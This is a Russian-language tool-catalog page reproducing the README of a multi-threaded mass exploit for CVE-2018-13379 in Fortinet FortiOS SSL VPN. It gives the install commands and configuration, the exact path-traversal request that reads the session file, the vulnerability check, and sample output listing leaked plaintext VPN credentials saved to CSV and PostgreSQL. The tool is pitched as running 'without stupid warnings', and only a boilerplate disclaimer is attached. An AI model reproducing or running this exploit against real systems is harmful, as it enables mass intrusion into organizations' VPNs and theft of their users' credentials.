Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — Массовый эксплоит CVE-2018-13379 для Fortinet FortiOS SSL VPN. Мгновенно извлекает учётные данные, сохраняет в CSV + PostgreSQL. Многопоточный, без дурацких предупреждений. | Kitploit
Инструменты/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
Атаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming
GitHubinstructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

Массовый эксплоит CVE-2018-13379 для Fortinet FortiOS SSL VPN. Мгновенно извлекает учётные данные, сохраняет в CSV + PostgreSQL. Многопоточный, без дурацких предупреждений.

Репозиторий
123 месяцев назадЕщё не проверено

preview

CVE-2018-13379 — Массовый эксплойт для Fortinet FortiOS SSL VPN

Инструмент для массовой эксплуатации уязвимости CVE-2018-13379 (обход каталога) в Fortinet FortiOS SSL VPN. Позволяет читать файлы сессий и извлекать логины и пароли в открытом виде.

Возможности

  • Эксплуатация CVE-2018-13379 через конечную точку /remote/fgt_lang
  • Многопоточность (20 потоков по умолчанию)
  • Мгновенное сохранение найденных учётных данных в CSV и PostgreSQL
  • Динамические имена таблиц в PostgreSQL с меткой времени (fortios_creds_20250120_143052)
  • Без предупреждений - только результаты

Установка

root@kitploit:~
git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

Конфигурация

Все настройки редактируются прямо в скрипте - никакой возни с аргументами командной строки:

root@kitploit:~
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file

PostgreSQL (необязательно - скрипт работает и без базы данных)

root@kitploit:~
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

Использование

  1. Создайте файл targets.txt с целями, по одной на строку:
root@kitploit:~
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. Запустите скрипт:
root@kitploit:~
python3 exploit.py

Результаты

  • CSV-файл — все найденные учётные данные с метками времени
  • Таблица PostgreSQL — при каждом запуске создаётся новая таблица (fortios_creds_YYYYMMDD_HHMMSS)

Пример вывода:

root@kitploit:~
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443

Как это работает

  1. GET-запрос отправляется на адрес https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession
  2. Ответ проверяется на наличие строки var fgt_lang (признак уязвимости)
  3. Пары username и password извлекаются из бинарного ответа
  4. Найденные данные немедленно сохраняются в CSV и PostgreSQL
  5. Скрипт переходит к следующей цели.

Требования

  • Python 3.6+
  • requests
  • psycopg2-binary (необязательно - без него работают только CSV-файлы)
  • urllib3

Предупреждение

Этот инструмент предназначен для образовательных целей и авторизованного тестирования. Вы несёте ответственность за свои действия.

Благодарности

  • Оригинальная уязвимость обнаружена Meh Chang
  • Логика эксплуатации основана на общедоступных исследованиях

Лицензия

Unlicense - делайте что хотите.

Скачать инструмент